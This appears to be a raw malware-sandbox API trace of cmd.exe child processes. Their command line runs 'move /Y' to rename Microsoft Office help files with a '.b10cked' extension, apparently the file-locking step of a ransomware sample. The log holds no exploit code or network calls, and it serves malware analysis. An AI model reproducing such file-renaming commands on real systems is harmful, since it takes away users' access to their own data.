GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0197.405] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0197.406] GetConsoleTitleW (in: lpConsoleTitle=0x4c08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.406] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0197.406] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0197.406] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0197.406] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0197.406] _wcsicmp (_String1="move", _String2=")") returned 68 [0197.406] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0197.406] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0197.407] _wcsicmp (_String1="IF", _String2="move") returned -4 [0197.407] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0197.407] _wcsicmp (_String1="REM", _String2="move") returned 5 [0197.407] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0197.409] GetConsoleTitleW (in: lpConsoleTitle=0x2ef988, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.409] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0197.409] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0197.409] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0197.409] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0197.409] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0197.409] _wcsicmp (_String1="move", _String2="CD") returned 10 [0197.410] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0197.410] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0197.410] _wcsicmp 
(_String1="move", _String2="REN") returned -5 [0197.410] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0197.410] _wcsicmp (_String1="move", _String2="SET") returned -6 [0197.410] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0197.410] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0197.410] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0197.410] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0197.410] _wcsicmp (_String1="move", _String2="MD") returned 11 [0197.410] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0197.410] _wcsicmp (_String1="move", _String2="RD") returned -5 [0197.410] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0197.410] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0197.410] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0197.410] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0197.410] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0197.410] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0197.410] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0197.410] _wcsicmp (_String1="move", _String2="VER") returned -9 [0197.410] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0197.410] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0197.410] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0197.410] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0197.410] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0197.410] _wcsicmp (_String1="move", _String2="START") returned -6 [0197.410] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0197.410] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0197.410] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0197.412] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.412] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.412] GetVolumeInformationW (in: lpRootPathName="C:\\", 
lpVolumeNameBuffer=0x2ef744, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef73c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef73c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0197.412] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0197.412] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0197.412] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0197.412] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0197.412] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0197.412] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp 
(_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0197.413] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0197.414] _wcsicmp (_String1="MSEXCE~1.HXN", _String2=".") returned 63 [0197.414] _wcsicmp (_String1="MSEXCE~1.HXN", _String2="..") returned 63 [0197.414] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msexce~1.hxn")) returned 0x2022 [0197.630] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4d1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.630] SetErrorMode (uMode=0x0) returned 0x0 [0197.630] SetErrorMode (uMode=0x1) returned 0x0 [0197.630] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", nBufferLength=0x104, lpBuffer=0x2ef0cc, 
lpFilePart=0x2ef0b4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", lpFilePart=0x2ef0b4*="MSEXCE~1.HXN") returned 0x27 [0197.630] SetErrorMode (uMode=0x0) returned 0x1 [0197.630] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0197.630] _wcsicmp (_String1="MSEXCE~1.HXN", _String2=".") returned 63 [0197.630] _wcsicmp (_String1="MSEXCE~1.HXN", _String2="..") returned 63 [0197.630] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msexce~1.hxn")) returned 0x2022 [0197.631] SetErrorMode (uMode=0x0) returned 0x0 [0197.631] SetErrorMode (uMode=0x1) returned 0x0 [0197.631] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", nBufferLength=0x104, lpBuffer=0x2ef548, lpFilePart=0x2ef2e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", lpFilePart=0x2ef2e0*="MSEXCE~1.HXN") returned 0x27 [0197.631] SetErrorMode (uMode=0x0) returned 0x1 [0197.631] SetErrorMode (uMode=0x0) returned 0x0 [0197.631] SetErrorMode (uMode=0x1) returned 0x0 [0197.631] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x2ef750, lpFilePart=0x2ef2e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked", lpFilePart=0x2ef2e0*="MS.EXCEL.14.1033.hxn.b10cked") returned 0x37 [0197.631] SetErrorMode (uMode=0x0) returned 0x1 [0197.631] SetLastError (dwErrCode=0x0) [0197.631] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.excel.14.1033.hxn.b10cked")) returned 0xffffffff [0197.631] GetLastError () returned 0x2 [0197.631] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2eec5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x2eec5c) returned 0x4c0e68 [0197.631] FindNextFileW (in: hFindFile=0x4c0e68, lpFindFileData=0x2eec5c | out: lpFindFileData=0x2eec5c) returned 0 [0197.632] FindClose (in: hFindFile=0x4c0e68 | out: hFindFile=0x4c0e68) returned 1 [0197.632] GetLastError () returned 0x12 [0197.632] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2eec5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eec5c) returned 0x4c0e68 [0197.632] FindNextFileW (in: hFindFile=0x4c0e68, lpFindFileData=0x2eec5c | out: lpFindFileData=0x2eec5c) returned 0 [0197.632] FindClose (in: hFindFile=0x4c0e68 | out: hFindFile=0x4c0e68) returned 1 [0197.632] GetLastError () returned 0x12 [0197.633] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x4d1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4d1bd8) returned 0x4c0e68 [0197.633] FindNextFileW (in: hFindFile=0x4c0e68, lpFindFileData=0x4d1bd8 | out: lpFindFileData=0x4d1bd8) returned 0 [0197.633] FindClose (in: hFindFile=0x4c0e68 | out: hFindFile=0x4c0e68) returned 1 [0197.633] GetLastError () returned 0x12 [0197.633] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x4d1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4d1bd8) returned 0x4c0e68 [0197.633] FindNextFileW (in: hFindFile=0x4c0e68, lpFindFileData=0x4d1bd8 | out: lpFindFileData=0x4d1bd8) returned 0 [0197.633] FindClose (in: hFindFile=0x4c0e68 | out: hFindFile=0x4c0e68) returned 1 [0197.634] GetLastError () returned 0x12 [0197.634] _get_osfhandle (_FileHandle=2) returned 0xb [0197.634] GetFileType (hFile=0xb) returned 0x2 [0197.634] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0197.634] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2eee2c | out: lpMode=0x2eee2c) returned 1 
[0197.634] _get_osfhandle (_FileHandle=2) returned 0xb [0197.634] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2eee60 | out: lpConsoleScreenBufferInfo=0x2eee60) returned 1 [0197.634] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0197.635] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eeea0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0197.635] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x2eee84, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eee84*=0x2c) returned 1 [0197.635] longjmp () [0197.636] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.636] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.636] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.636] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0197.636] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.636] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0197.636] SetConsoleInputExeNameW () returned 0x1 [0197.636] GetConsoleOutputCP () returned 0x1b5 [0197.636] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.636] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.636] exit (_Code=1) Process: id = "460" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0x6d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29101 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29102 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29103 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29104 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 29105 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29106 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29107 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29108 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007ffb0000" filename = "" Region: id = 29109 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 29110 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29145 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29146 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29147 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29148 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 29149 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 29150 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29151 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29152 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29153 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" 
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29154 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29155 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29156 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29157 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29158 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29159 start_va = 0x390000 end_va = 0x457fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 29160 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29161 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29162 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29163 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 29164 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 29165 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 29166 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 29167 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 29168 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 29193 start_va = 0x460000 end_va = 0x51ffff entry_point = 0x460000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 655 os_tid = 0xbcc [0197.439] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fb8c | out: lpSystemTimeAsFileTime=0x18fb8c*(dwLowDateTime=0xaa7ffc00, dwHighDateTime=0x1d440a9)) [0197.440] GetCurrentProcessId () returned 0x6d8 [0197.440] GetCurrentThreadId () returned 0xbcc [0197.440] GetTickCount () returned 0x37ea1 [0197.440] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb84 | out: lpPerformanceCount=0x18fb84*=25422880074) returned 1 [0197.440] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0197.440] __set_app_type (_Type=0x1) [0197.440] __p__fmode () returned 0x76b331f4 [0197.440] __p__commode () returned 0x76b331fc [0197.440] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0197.440] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, 
_Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0197.441] GetCurrentThreadId () returned 0xbcc [0197.441] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbcc) returned 0x38 [0197.441] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0197.441] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0197.441] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.441] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0197.441] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fb1c | out: phkResult=0x18fb1c*=0x0) returned 0x2 [0197.441] VirtualQuery (in: lpAddress=0x18fb53, lpBuffer=0x18faec, dwLength=0x1c | out: lpBuffer=0x18faec*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0197.441] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18faec, dwLength=0x1c | out: lpBuffer=0x18faec*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0197.441] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18faec, dwLength=0x1c | out: lpBuffer=0x18faec*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0197.441] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18faec, dwLength=0x1c | out: lpBuffer=0x18faec*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0197.441] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18faec, dwLength=0x1c | out: lpBuffer=0x18faec*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, 
Type=0x40000)) returned 0x1c [0197.441] GetConsoleOutputCP () returned 0x1b5 [0197.441] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.441] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0197.441] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.441] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0197.442] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.442] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0197.442] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.442] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.443] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.443] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0197.443] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.443] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0197.443] GetEnvironmentStringsW () returned 0x2a0190* [0197.443] FreeEnvironmentStringsW (penv=0x2a0190) returned 1 [0197.443] GetEnvironmentStringsW () returned 0x2a0190* [0197.444] FreeEnvironmentStringsW (penv=0x2a0190) returned 1 [0197.444] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ea8c | out: phkResult=0x18ea8c*=0x40) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x0, lpData=0x18ea98*=0xb8, lpcbData=0x18ea90*=0x1000) returned 0x2 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x1, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ea94, 
